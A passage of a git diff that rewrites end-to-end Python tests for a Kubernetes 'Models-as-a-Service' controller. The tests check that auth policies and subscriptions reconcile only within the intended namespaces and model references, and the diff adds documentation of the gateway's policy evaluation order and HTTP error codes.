model") +class TestMaaSControllerWatchNamespace: + """Verifies MaaS controller only reconciles MaaSAuthPolicy and MaaSSubscription in the subscription namespace.""" - # Create first policy in policy_namespace + def test_authpolicy_and_subscription_in_maas_subscription_namespace(self): + """MaaSAuthPolicy and MaaSSubscription in MaaS subscription namespace should be reconciled + and should appear in the AuthPolicy and TRLP annotations for the model.""" + ns = _ns() + try: _apply_cr({ "apiVersion": "maas.opendatahub.io/v1alpha1", "kind": "MaaSAuthPolicy", - "metadata": {"name": policy1_name, "namespace": policy_namespace}, + "metadata": {"name": "e2e-watched-auth", "namespace": ns}, "spec": { "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], "subjects": {"groups": [{"name": "system:authenticated"}]}, }, }) + _apply_cr({ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": {"name": "e2e-watched-sub", "namespace": ns}, + "spec": { + "owner": {"groups": [{"name": "system:authenticated"}]}, + "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}], + }, + }) + _wait_reconcile(15) + + auth_name = f"maas-auth-{MODEL_REF}" + auth_policies = [x.strip() for x in (_get_cr_annotation("authpolicy", auth_name, MODEL_NAMESPACE, "maas.opendatahub.io/auth-policies") or "").split(",") if x.strip()] + assert "e2e-watched-auth" in auth_policies, ( + f"AuthPolicy {auth_name} not found or MaaSAuthPolicy e2e-watched-auth not reconciled" + ) - # Create second policy in policy_namespace2 + trlp_name = f"maas-trlp-{MODEL_REF}" + subscriptions = [x.strip() for x in (_get_cr_annotation("tokenratelimitpolicy", trlp_name, MODEL_NAMESPACE, "maas.opendatahub.io/subscriptions") or "").split(",") if x.strip()] + assert "e2e-watched-sub" in subscriptions, ( + f"TRLP {trlp_name} not found or MaaSSubscription e2e-watched-sub not reconciled" + ) + finally: + _delete_cr("MaaSAuthPolicy", 
"e2e-watched-auth", ns) + _delete_cr("MaaSSubscription", "e2e-watched-sub", ns) + _wait_reconcile() + + def test_authpolicy_and_subscription_in_another_namespace(self): + """MaaSAuthPolicy and MaaSSubscription in another namespace should not be reconciled + and should not appear in the AuthPolicy and TRLP annotations for the model.""" + ns = "e2e-unwatched-ns" + _create_namespace(ns) + try: _apply_cr({ "apiVersion": "maas.opendatahub.io/v1alpha1", "kind": "MaaSAuthPolicy", - "metadata": {"name": policy2_name, "namespace": policy_namespace2}, + "metadata": {"name": "e2e-unwatched-auth", "namespace": ns}, "spec": { "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], - "subjects": {"groups": [{"name": test_group}]}, + "subjects": {"groups": [{"name": "system:authenticated"}]}, + }, + }) + _apply_cr({ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": {"name": "e2e-unwatched-sub", "namespace": ns}, + "spec": { + "owner": {"groups": [{"name": "system:authenticated"}]}, + "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}], }, }) + _wait_reconcile(15) - # Wait for reconciliation - time.sleep(RECONCILE_WAIT) - - # Verify AuthPolicy exists in model namespace - auth_policy_name = f"maas-auth-{MODEL_REF}" - auth_policy = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE) - assert auth_policy is not None, "Aggregated AuthPolicy should exist" - - # Wait for AuthPolicy to be enforced - log.info(f"Waiting for AuthPolicy {auth_policy_name} to be enforced...") - enforced = _wait_for_authpolicy_enforced(auth_policy_name, MODEL_NAMESPACE, timeout=60) - assert enforced, f"AuthPolicy {auth_policy_name} not enforced within timeout" - - # Verify both policies' subjects are in the AuthPolicy - spec = auth_policy.get("spec", {}) - log.info(f"AuthPolicy spec: {json.dumps(spec, indent=2)[:500]}") - - # Test model listing endpoint - r = _list_models(api_key, MODEL_REF, 
MODEL_NAMESPACE) - assert r.status_code == 200, f"Model listing failed: {r.status_code}" - models_data = r.json() - model_ids = [m.get("id") for m in models_data.get("data", [])] - assert MODEL_NAME in model_ids, f"Expected model {MODEL_NAME} not in list: {model_ids}" - - # Make inference request to verify it works - r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=90) - assert r.status_code == 200, f"Expected 200, got {r.status_code}" - - # Now delete the FIRST policy (not the last one) - log.info(f"Deleting first policy {policy1_name} (should NOT delete AuthPolicy)") - _delete_cr("MaaSAuthPolicy", policy1_name, policy_namespace) - time.sleep(RECONCILE_WAIT) - - # Verify AuthPolicy still exists (bug fix: it should NOT be deleted) - auth_policy_after = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE) - assert auth_policy_after is not None, \ - "AuthPolicy should still exist after deleting first policy (other policies reference it)" - - # Inference should still work - r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=60) - assert r.status_code == 200, "Inference should still work after deleting first policy" - - # Now delete the LAST test policy - log.info(f"Deleting last test policy {policy2_name}") - _delete_cr("MaaSAuthPolicy", policy2_name, policy_namespace2) - time.sleep(RECONCILE_WAIT) - - # Verify AuthPolicy still exists if there are other MaaSAuthPolicies for this model - # (like the pre-existing simulator-access policy) - auth_policy_final = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE) - # Note: AuthPolicy may still exist due to pre-existing policies (e.g. 
simulator-access) - # The key test was that deleting the FIRST policy didn't delete the AuthPolicy - log.info(f"AuthPolicy exists after deleting test policies: {auth_policy_final is not None}") - - log.info("✓ Multiple policies deletion test passed (bug fix verified)") + auth_name = f"maas-auth-{MODEL_REF}" + auth_policies = [x.strip() for x in (_get_cr_annotation("authpolicy", auth_name, MODEL_NAMESPACE, "maas.opendatahub.io/auth-policies") or "").split(",") if x.strip()] + assert "e2e-unwatched-auth" not in auth_policies, ( + "MaaSAuthPolicy e2e-unwatched-auth reconciled" + ) + trlp_name = f"maas-trlp-{MODEL_REF}" + subscriptions = [x.strip() for x in (_get_cr_annotation("tokenratelimitpolicy", trlp_name, MODEL_NAMESPACE, "maas.opendatahub.io/subscriptions") or "").split(",") if x.strip()] + assert "e2e-unwatched-sub" not in subscriptions, ( + "MaaSSubscription e2e-unwatched-sub reconciled" + ) finally: - _delete_cr("MaaSAuthPolicy", policy1_name, policy_namespace) - _delete_cr("MaaSAuthPolicy", policy2_name, policy_namespace2) - _delete_namespace(policy_namespace2) + _delete_cr("MaaSAuthPolicy", "e2e-unwatched-auth", ns) + _delete_cr("MaaSSubscription", "e2e-unwatched-sub", ns) + _wait_reconcile() + _delete_namespace(ns) -class TestCrossNamespaceSubscription: - """Test MaaSSubscription can reference models in different namespaces.""" +class TestModelRef: + """Test model ref scoping: MaaSAuthPolicy and MaaSSubscription only reconcile into the referenced model's namespace.""" - def test_subscription_in_different_namespace(self, policy_namespace, api_key): + def test_auth_policy_model_ref(self): """ - Create MaaSSubscription in policy-namespace that references model in llm namespace. - Verify that TokenRateLimitPolicy is created in llm namespace (model's namespace). - Verify that inference requests work with rate limiting. + Create a new namespace and two MaaSModelRefs: MODEL_REF in the new namespace, and another + name in MODEL_NAMESPACE. 
Create MaaSAuthPolicy referencing MODEL_REF in MODEL_NAMESPACE. + Verify it is reconciled into MODEL_REF's AuthPolicy in MODEL_NAMESPACE, and the other two + models' AuthPolicies do not exist. """ - subscription_name = f"cross-ns-sub-{uuid.uuid4().hex[:6]}" - maas_auth_policy_name = f"cross-ns-auth-for-sub-{uuid.uuid4().hex[:6]}" - - log.info(f"Creating cross-namespace MaaSSubscription {subscription_name}") - log.info(f" Subscription namespace: {policy_namespace}") - log.info(f" Model namespace: {MODEL_NAMESPACE}") - - # First ensure there's an AuthPolicy for the model (subscription needs auth to work) - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSAuthPolicy", - "metadata": {"name": maas_auth_policy_name, "namespace": policy_namespace}, - "spec": { - "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], - "subjects": {"groups": [{"name": "system:authenticated"}]}, - }, - }) - - # Create MaaSSubscription in policy namespace referencing model in MODEL_NAMESPACE - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSSubscription", - "metadata": {"name": subscription_name, "namespace": policy_namespace}, - "spec": { - "owner": {"groups": [{"name": "system:authenticated"}]}, - "modelRefs": [ - { - "name": MODEL_REF, - "namespace": MODEL_NAMESPACE, - "tokenRateLimits": [{"limit": 100, "window": "1m"}], - } - ], - }, - }) + other_ns = f"e2e-modelref-{uuid.uuid4().hex[:6]}" + other_model_ref = f"e2e-other-model-{uuid.uuid4().hex[:6]}" + policy_name = f"e2e-auth-ref-{uuid.uuid4().hex[:6]}" + ns = _ns() + _create_namespace(other_ns) try: - # Wait for controller to reconcile - time.sleep(RECONCILE_WAIT) + # Create ExternalModel CRs in both namespaces + _create_external_model("test-backend", other_ns) + _create_external_model("test-backend", MODEL_NAMESPACE) - # Verify MaaSSubscription exists - maas_sub = _get_cr("MaaSSubscription", subscription_name, policy_namespace) - assert maas_sub is not None, 
f"MaaSSubscription {subscription_name} not found" - - # Wait for AuthPolicy to be enforced (subscription needs auth to work) - auth_policy_name = f"maas-auth-{MODEL_REF}" - log.info(f"Waiting for AuthPolicy {auth_policy_name} to be enforced...") - enforced = _wait_for_authpolicy_enforced(auth_policy_name, MODEL_NAMESPACE, timeout=60) - assert enforced, f"AuthPolicy {auth_policy_name} not enforced within timeout" + # MaaSModelRef in the new namespace with same name as MODEL_REF + _apply_cr({ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSModelRef", + "metadata": {"name": MODEL_REF, "namespace": other_ns}, + "spec": {"modelRef": {"kind": "ExternalModel", "name": "test-backend", "provider": "test"}}, + }) + # MaaSModelRef in MODEL_NAMESPACE with a different name (not referenced by policy) + _apply_cr({ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSModelRef", + "metadata": {"name": other_model_ref, "namespace": MODEL_NAMESPACE}, + "spec": {"modelRef": {"kind": "ExternalModel", "name": "test-backend", "provider": "test"}}, + }) - # Verify generated TokenRateLimitPolicy is created in MODEL namespace - trlp_name = f"maas-trlp-{MODEL_REF}" - trlp = _get_cr("TokenRateLimitPolicy", trlp_name, MODEL_NAMESPACE) - assert trlp is not None, \ - f"TokenRateLimitPolicy {trlp_name} not found in model namespace {MODEL_NAMESPACE}" - - # Verify TokenRateLimitPolicy is NOT in subscription namespace - trlp_in_sub_ns = _get_cr("TokenRateLimitPolicy", trlp_name, policy_namespace) - assert trlp_in_sub_ns is None, \ - f"TokenRateLimitPolicy should not exist in subscription namespace {policy_namespace}" - - # Test model listing endpoint - log.info(f"Testing /v1/models endpoint with cross-namespace Subscription {subscription_name}") - r = _list_models(api_key, MODEL_REF, MODEL_NAMESPACE, subscription=subscription_name) - assert r.status_code == 200, f"Model listing failed: {r.status_code}" - models_data = r.json() - model_ids = [m.get("id") for m in 
models_data.get("data", [])] - assert MODEL_NAME in model_ids, f"Expected model {MODEL_NAME} not in list: {model_ids}" - log.info(f"✓ Model {MODEL_NAME} found in /v1/models response") - - # Make inference request to verify everything works - log.info(f"Testing inference request with subscription {subscription_name}") - r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=90, subscription=subscription_name) - assert r.status_code == 200, f"Expected 200, got {r.status_code}" - - log.info("✓ Cross-namespace Subscription test passed") + # MaaSAuthPolicy referencing only MODEL_REF in MODEL_NAMESPACE + _apply_cr({ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSAuthPolicy", + "metadata": {"name": policy_name, "namespace": ns}, + "spec": { + "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], + "subjects": {"groups": [{"name": "system:authenticated"}]}, + }, + }) + _wait_reconcile(15) + + auth_name = f"maas-auth-{MODEL_REF}" + auth_name_other = f"maas-auth-{other_model_ref}" + + # Verify: policy is reconciled into MODEL_REF's AuthPolicy in MODEL_NAMESPACE + auth_policies_reconciled = [x.strip() for x in (_get_cr_annotation("authpolicy", auth_name, MODEL_NAMESPACE, "maas.opendatahub.io/auth-policies") or "").split(",") if x.strip()] + assert policy_name in auth_policies_reconciled, ( + f"MaaSAuthPolicy {policy_name} should be in AuthPolicy {auth_name} in {MODEL_NAMESPACE}, got: {auth_policies_reconciled}" + ) + + # Verify: MODEL_REF's AuthPolicy in the new namespace does not exist + auth_in_other_ns = _get_cr("AuthPolicy", auth_name, other_ns) + assert auth_in_other_ns is None, ( + f"AuthPolicy {auth_name} should NOT exist in {other_ns}" + ) + + # Verify: other model's AuthPolicy in MODEL_NAMESPACE does not exist + auth_other_in_model_ns = _get_cr("AuthPolicy", auth_name_other, MODEL_NAMESPACE) + assert auth_other_in_model_ns is None, ( + f"AuthPolicy {auth_name_other} should NOT exist in {MODEL_NAMESPACE} (policy references 
MODEL_REF only)" + ) + log.info("✓ MaaSAuthPolicy reconciled into MODEL_REF in MODEL_NAMESPACE only; other AuthPolicies do not exist") finally: - _delete_cr("MaaSSubscription", subscription_name, policy_namespace) - _delete_cr("MaaSAuthPolicy", maas_auth_policy_name, policy_namespace) - - def test_multiple_subscriptions_different_namespaces_same_model(self, policy_namespace, api_key): + _delete_cr("MaaSAuthPolicy", policy_name, ns) + _delete_cr("MaaSModelRef", MODEL_REF, other_ns) + _delete_cr("MaaSModelRef", other_model_ref, MODEL_NAMESPACE) + _delete_cr("ExternalModel", "test-backend", other_ns) + _delete_cr("ExternalModel", "test-backend", MODEL_NAMESPACE) + _delete_namespace(other_ns) + _wait_reconcile() + + def test_subscription_model_ref(self): """ - Create multiple MaaSSubscriptions in different namespaces referencing the same model. - Verify that they aggregate correctly into a single TokenRateLimitPolicy. - Test the deletion bug fix: deleting one subscription should NOT delete the TRLP. + Create a new namespace and two MaaSModelRefs: MODEL_REF in the new namespace, and another + name in MODEL_NAMESPACE. Create MaaSSubscription referencing MODEL_REF in MODEL_NAMESPACE. + Verify it is reconciled into MODEL_REF's TRLP in MODEL_NAMESPACE, and the other two + models' TRLPs do not exist. 
""" - sub1_name = f"multi-ns-sub1-{uuid.uuid4().hex[:6]}" - sub2_name = f"multi-ns-sub2-{uuid.uuid4().hex[:6]}" - maas_auth_policy_name = f"multi-ns-auth-{uuid.uuid4().hex[:6]}" - test_group = f"test-group-{uuid.uuid4().hex[:4]}" - - # Create second subscription namespace - sub_namespace2 = f"e2e-ns-sub2-{uuid.uuid4().hex[:6]}" - _create_namespace(sub_namespace2) + other_ns = f"e2e-modelref-{uuid.uuid4().hex[:6]}" + other_model_ref = f"e2e-other-model-{uuid.uuid4().hex[:6]}" + sub_name = f"e2e-sub-ref-{uuid.uuid4().hex[:6]}" + ns = _ns() + _create_namespace(other_ns) try: - log.info(f"Creating two MaaSSubscriptions in different namespaces for same model") + # Create ExternalModel CRs in both namespaces + _create_external_model("test-backend", other_ns) + _create_external_model("test-backend", MODEL_NAMESPACE) - # Create auth policy first + # MaaSModelRef in the new namespace with same name as MODEL_REF _apply_cr({ "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSAuthPolicy", - "metadata": {"name": maas_auth_policy_name, "namespace": policy_namespace}, - "spec": { - "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], - "subjects": {"groups": [{"name": "system:authenticated"}]}, - }, + "kind": "MaaSModelRef", + "metadata": {"name": MODEL_REF, "namespace": other_ns}, + "spec": {"modelRef": {"kind": "ExternalModel", "name": "test-backend", "provider": "test"}}, }) - - # Create first subscription in policy_namespace + # MaaSModelRef in MODEL_NAMESPACE with a different name _apply_cr({ "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSSubscription", - "metadata": {"name": sub1_name, "namespace": policy_namespace}, - "spec": { - "owner": {"groups": [{"name": "system:authenticated"}]}, - "modelRefs": [ - { - "name": MODEL_REF, - "namespace": MODEL_NAMESPACE, - "tokenRateLimits": [{"limit": 100, "window": "1m"}], - } - ], - }, + "kind": "MaaSModelRef", + "metadata": {"name": other_model_ref, "namespace": MODEL_NAMESPACE}, + "spec": 
{"modelRef": {"kind": "ExternalModel", "name": "test-backend", "provider": "test"}}, }) - # Create second subscription in sub_namespace2 + # MaaSSubscription referencing only MODEL_REF in MODEL_NAMESPACE _apply_cr({ "apiVersion": "maas.opendatahub.io/v1alpha1", "kind": "MaaSSubscription", - "metadata": {"name": sub2_name, "namespace": sub_namespace2}, + "metadata": {"name": sub_name, "namespace": ns}, "spec": { - "owner": {"groups": [{"name": test_group}]}, + "owner": {"groups": [{"name": "system:authenticated"}]}, "modelRefs": [ - { - "name": MODEL_REF, - "namespace": MODEL_NAMESPACE, - "tokenRateLimits": [{"limit": 200, "window": "1m"}], - } + {"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 100, "window": "1m"}]}, ], }, }) - # Wait for reconciliation - time.sleep(RECONCILE_WAIT) - - # Wait for AuthPolicy to be enforced (subscription needs auth to work) - auth_policy_name = f"maas-auth-{MODEL_REF}" - log.info(f"Waiting for AuthPolicy {auth_policy_name} to be enforced...") - enforced = _wait_for_authpolicy_enforced(auth_policy_name, MODEL_NAMESPACE, timeout=60) - assert enforced, f"AuthPolicy {auth_policy_name} not enforced within timeout" + _wait_reconcile(15) - # Verify TokenRateLimitPolicy exists in model namespace trlp_name = f"maas-trlp-{MODEL_REF}" - trlp = _get_cr("TokenRateLimitPolicy", trlp_name, MODEL_NAMESPACE) - assert trlp is not None, "Aggregated TokenRateLimitPolicy should exist" - - # Test model listing endpoint - log.info(f"Testing /v1/models with subscription {sub1_name}") - r = _list_models(api_key, MODEL_REF, MODEL_NAMESPACE, subscription=sub1_name) - assert r.status_code == 200, f"Model listing failed: {r.status_code}" - models_data = r.json() - model_ids = [m.get("id") for m in models_data.get("data", [])] - assert MODEL_NAME in model_ids, f"Expected model {MODEL_NAME} not in list: {model_ids}" - - # Make inference request to verify it works - r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, 
timeout=90, subscription=sub1_name) - assert r.status_code == 200, f"Expected 200, got {r.status_code}" - - # Delete the FIRST subscription (not the last one) - log.info(f"Deleting first subscription {sub1_name} (should NOT delete TRLP)") - _delete_cr("MaaSSubscription", sub1_name, policy_namespace) - time.sleep(RECONCILE_WAIT) - - # Verify TRLP still exists (bug fix: it should NOT be deleted) - trlp_after = _get_cr("TokenRateLimitPolicy", trlp_name, MODEL_NAMESPACE) - assert trlp_after is not None, \ - "TokenRateLimitPolicy should still exist after deleting first subscription" - - # Inference should still work (use default simulator-subscription since sub1 was deleted) - log.info("Testing inference with default simulator-subscription after deleting sub1") - r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=60, subscription="simulator-subscription") - assert r.status_code == 200, "Inference should still work after deleting first subscription" - - # Delete the LAST test subscription - log.info(f"Deleting last test subscription {sub2_name}") - _delete_cr("MaaSSubscription", sub2_name, sub_namespace2) - time.sleep(RECONCILE_WAIT) - - # Verify TRLP still exists if there are other MaaSSubscriptions for this model - # (like the pre-existing simulator-subscription) - trlp_final = _get_cr("TokenRateLimitPolicy", trlp_name, MODEL_NAMESPACE) - # Note: TRLP may still exist due to pre-existing subscriptions (e.g. 
simulator-subscription) - # The key test was that deleting the FIRST subscription didn't delete the TRLP - log.info(f"TokenRateLimitPolicy exists after deleting test subscriptions: {trlp_final is not None}") - - log.info("✓ Multiple subscriptions deletion test passed (bug fix verified)") - - finally: - _delete_cr("MaaSSubscription", sub1_name, policy_namespace) - _delete_cr("MaaSSubscription", sub2_name, sub_namespace2) - _delete_cr("MaaSAuthPolicy", maas_auth_policy_name, policy_namespace) - _delete_namespace(sub_namespace2) - - -class TestAuthorizationBoundary: - """Test that namespace boundaries provide proper authorization isolation.""" - - def test_model_isolation_between_namespaces(self, policy_namespace): - """ - Verify that policies in one namespace cannot accidentally affect models - in other namespaces unless explicitly configured. - """ - # This is more of a design verification test - # The key security property: MaaSAuthPolicy in namespace A can only affect - # models that it explicitly lists with their namespaces in spec.modelRefs - - # If a policy doesn't list a model, it shouldn't affect it - # This is enforced by the controller only creating AuthPolicies for - # models explicitly listed in spec.modelRefs[] - - policy_name = f"isolated-policy-{uuid.uuid4().hex[:6]}" - unmanaged_model_name = f"unmanaged-model-{uuid.uuid4().hex[:6]}" - - # Create a temporary test model that won't be referenced by the policy - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSModelRef", - "metadata": {"name": unmanaged_model_name, "namespace": MODEL_NAMESPACE}, - "spec": { - "modelRef": {"kind": "ExternalModel", "name": "test-backend"} - } - }) - - # Create a policy that only targets MODEL_REF (not the temporary model) - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSAuthPolicy", - "metadata": {"name": policy_name, "namespace": policy_namespace}, - "spec": { - "modelRefs": [{"name": MODEL_REF, "namespace": 
MODEL_NAMESPACE}], - "subjects": {"groups": [{"name": "system:authenticated"}]}, - }, - }) - - try: - time.sleep(RECONCILE_WAIT) - - # Verify that this policy ONLY created AuthPolicy for the specified model - auth_policy_name = f"maas-auth-{MODEL_REF}" - auth_policy = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE) - assert auth_policy is not None, "AuthPolicy should exist for specified model" - - # Negative test: Verify NO Kuadrant resources created for unmanaged model - unmanaged_auth_policy = _get_cr("AuthPolicy", f"maas-auth-{unmanaged_model_name}", MODEL_NAMESPACE) - assert unmanaged_auth_policy is None, \ - f"AuthPolicy should NOT exist for unmanaged model {unmanaged_model_name}" - - log.info(f"✓ Verified no AuthPolicy created for unmanaged model {unmanaged_model_name}") - log.info("✓ Authorization boundary test passed - policies only affect listed models") - + trlp_name_other = f"maas-trlp-{other_model_ref}" + + # Verify: subscription is reconciled into MODEL_REF's TRLP in MODEL_NAMESPACE + subscriptions_in_model_ns = [x.strip() for x in (_get_cr_annotation("tokenratelimitpolicy", trlp_name, MODEL_NAMESPACE, "maas.opendatahub.io/subscriptions") or "").split(",") if x.strip()] + assert sub_name in subscriptions_in_model_ns, ( + f"MaaSSubscription {sub_name} should be in TRLP {trlp_name} in {MODEL_NAMESPACE}, got: {subscriptions_in_model_ns}" + ) + + # Verify: MODEL_REF's TRLP in the new namespace does not exist + trlp_in_other_ns = _get_cr("tokenratelimitpolicy", trlp_name, other_ns) + assert trlp_in_other_ns is None, ( + f"TokenRateLimitPolicy {trlp_name} should NOT exist in {other_ns}" + ) + + # Verify: other model's TRLP in MODEL_NAMESPACE does not exist + trlp_other_in_model_ns = _get_cr("tokenratelimitpolicy", trlp_name_other, MODEL_NAMESPACE) + assert trlp_other_in_model_ns is None, ( + f"TokenRateLimitPolicy {trlp_name_other} should NOT exist in {MODEL_NAMESPACE} (subscription references MODEL_REF only)" + ) + log.info("✓ MaaSSubscription 
reconciled into MODEL_REF in MODEL_NAMESPACE only; other TRLPs do not exist") finally: - _delete_cr("MaaSAuthPolicy", policy_name, policy_namespace) - _delete_cr("MaaSModelRef", unmanaged_model_name, MODEL_NAMESPACE) + _delete_cr("MaaSSubscription", sub_name, ns) + _delete_cr("MaaSModelRef", MODEL_REF, other_ns) + _delete_cr("MaaSModelRef", other_model_ref, MODEL_NAMESPACE) + _delete_cr("ExternalModel", "test-backend", other_ns) + _delete_cr("ExternalModel", "test-backend", MODEL_NAMESPACE) + _delete_namespace(other_ns) + _wait_reconcile() diff --git a/test/e2e/tests/test_subscription.py b/test/e2e/tests/test_subscription.py index 3dce7cdad..65ad4553d 100644 --- a/test/e2e/tests/test_subscription.py +++ b/test/e2e/tests/test_subscription.py @@ -4,6 +4,29 @@ Tests auth enforcement (MaaSAuthPolicy) and rate limiting (MaaSSubscription) by hitting the gateway with API keys created via the MaaS API. +Policy Evaluation Order: + 1. AuthPolicy (Kuadrant) - FIRST LINE OF DEFENSE + - Validates API key via /internal/v1/api-keys/validate + - Validates subscription selection via /v1/subscriptions/select + * Checks subscription exists and user has access (groups/users match) + * Inference uses API keys only; each key carries the bound MaaSSubscription from mint + - Denies invalid requests with 403 Forbidden (subscription validation failures) + - Injects auth.identity.selected_subscription for downstream policies + + 2. 
TokenRateLimitPolicy (Kuadrant) - RATE LIMITING ONLY + - Trusts auth.identity.selected_subscription (already validated by AuthPolicy) + - Applies rate limits based on selected subscription + - Returns 429 Too Many Requests only when rate limit exceeded + - Does NOT re-validate subscription (AuthPolicy already did this) + +Expected Error Codes: + - 401 Unauthorized: Missing or invalid API key + - 403 Forbidden: Valid API key but subscription validation failed + * Subscription bound on the key no longer exists or is invalid + * No subscriptions available for user + - 429 Too Many Requests: Valid request but rate limit exceeded + - 200 OK: Valid request with available rate limit quota + Requires: - GATEWAY_HOST env var (e.g. maas.apps.cluster.example.com) - MAAS_API_BASE_URL env var (e.g. https://maas.apps.cluster.example.com/maas-api) @@ -13,7 +36,6 @@ Environment variables (all optional, with defaults): - GATEWAY_HOST: Gateway hostname (required) - MAAS_API_BASE_URL: MaaS API URL (required for API key creation) - - DEPLOYMENT_NAMESPACE: MaaS API and Controller namespace (default: opendatahub) - MAAS_SUBSCRIPTION_NAMESPACE: MaaS CRs namespace (default: models-as-a-service) - E2E_TEST_TOKEN_SA_NAMESPACE, E2E_TEST_TOKEN_SA_NAME: When set, use this SA token instead of oc whoami -t (e.g. 
for Prow where oc whoami -t is unavailable) @@ -26,10 +48,16 @@ - E2E_PREMIUM_MODEL_REF: Premium model ref for CRs (default: premium-simulated-simulated-premium) - E2E_UNCONFIGURED_MODEL_REF: Unconfigured model ref (default: e2e-unconfigured-facebook-opt-125m-simulated) - E2E_UNCONFIGURED_MODEL_PATH: Path to unconfigured model (default: /llm/e2e-unconfigured-facebook-opt-125m-simulated) + - E2E_DISTINCT_MODEL_REF: First distinct model ref for multi-model tests (default: e2e-distinct-simulated) + - E2E_DISTINCT_MODEL_PATH: Path to first distinct model (default: /llm/e2e-distinct-simulated) + - E2E_DISTINCT_MODEL_ID: Model ID served by first distinct model (default: test/e2e-distinct-model) + - E2E_DISTINCT_MODEL_2_REF: Second distinct model ref for multi-model tests (default: e2e-distinct-2-simulated) + - E2E_DISTINCT_MODEL_2_PATH: Path to second distinct model (default: /llm/e2e-distinct-2-simulated) + - E2E_DISTINCT_MODEL_2_ID: Model ID served by second distinct model (default: test/e2e-distinct-model-2) - E2E_SIMULATOR_SUBSCRIPTION: Free-tier subscription (default: simulator-subscription) - E2E_PREMIUM_SIMULATOR_SUBSCRIPTION: Premium-tier subscription (default: premium-simulator-subscription) - E2E_SIMULATOR_ACCESS_POLICY: Simulator auth policy name (default: simulator-access) - - E2E_INVALID_SUBSCRIPTION: Invalid subscription name for 429 test (default: nonexistent-sub) + - E2E_INVALID_SUBSCRIPTION: Invalid subscription name for 403 test (default: nonexistent-sub) """ import base64 @@ -61,6 +89,12 @@ MODEL_NAMESPACE = os.environ.get("E2E_MODEL_NAMESPACE", "llm") UNCONFIGURED_MODEL_REF = os.environ.get("E2E_UNCONFIGURED_MODEL_REF", "e2e-unconfigured-facebook-opt-125m-simulated") UNCONFIGURED_MODEL_PATH = os.environ.get("E2E_UNCONFIGURED_MODEL_PATH", "/llm/e2e-unconfigured-facebook-opt-125m-simulated") +DISTINCT_MODEL_REF = os.environ.get("E2E_DISTINCT_MODEL_REF", "e2e-distinct-simulated") +DISTINCT_MODEL_PATH = os.environ.get("E2E_DISTINCT_MODEL_PATH", 
"/llm/e2e-distinct-simulated") +DISTINCT_MODEL_ID = os.environ.get("E2E_DISTINCT_MODEL_ID", "test/e2e-distinct-model") +DISTINCT_MODEL_2_REF = os.environ.get("E2E_DISTINCT_MODEL_2_REF", "e2e-distinct-2-simulated") +DISTINCT_MODEL_2_PATH = os.environ.get("E2E_DISTINCT_MODEL_2_PATH", "/llm/e2e-distinct-2-simulated") +DISTINCT_MODEL_2_ID = os.environ.get("E2E_DISTINCT_MODEL_2_ID", "test/e2e-distinct-model-2") SIMULATOR_SUBSCRIPTION = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription") PREMIUM_SIMULATOR_SUBSCRIPTION = os.environ.get( "E2E_PREMIUM_SIMULATOR_SUBSCRIPTION", "premium-simulator-subscription" @@ -166,29 +200,35 @@ def _create_sa_token(sa_name, namespace=None, duration="10m"): # API Key Management Helpers # --------------------------------------------------------------------------- -def _create_api_key(oc_token: str, name: str = None) -> str: +def _create_api_key(oc_token: str, name: str = None, subscription: str = None) -> str: """Create an API key using the MaaS API and return the plaintext key. Note: API keys inherit the authenticated user's groups automatically. Users can only create keys for themselves with their own groups. - + Pass ``subscription`` to bind a specific MaaSSubscription at mint time. 
+ Args: oc_token: OC token for authentication with maas-api name: Optional name for the key (auto-generated if not provided) - + subscription: Optional MaaSSubscription name to bind (highest-priority auto-bind if omitted) + Returns: The plaintext API key (sk-oai-xxx format) """ url = f"{_maas_api_url()}/v1/api-keys" key_name = name or f"e2e-sub-test-{uuid.uuid4().hex[:8]}" - + + body = {"name": key_name} + if subscription: + body["subscription"] = subscription + r = requests.post( url, headers={ "Authorization": f"Bearer {oc_token}", "Content-Type": "application/json", }, - json={"name": key_name}, + json=body, timeout=TIMEOUT, verify=TLS_VERIFY, ) @@ -200,7 +240,7 @@ def _create_api_key(oc_token: str, name: str = None) -> str: if not api_key: raise RuntimeError(f"API key response missing 'key' field: {data}") - log.info(f"Created API key '{key_name}' (inherits user's groups)") + log.info(f"Created API key '{key_name}' (inherits user's groups), bound to subscription '{subscription}'") return api_key @@ -233,7 +273,11 @@ def _get_default_api_key() -> str: pid = os.getpid() if pid not in _default_api_key_cache: oc_token = _get_cluster_token() - _default_api_key_cache[pid] = _create_api_key(oc_token, 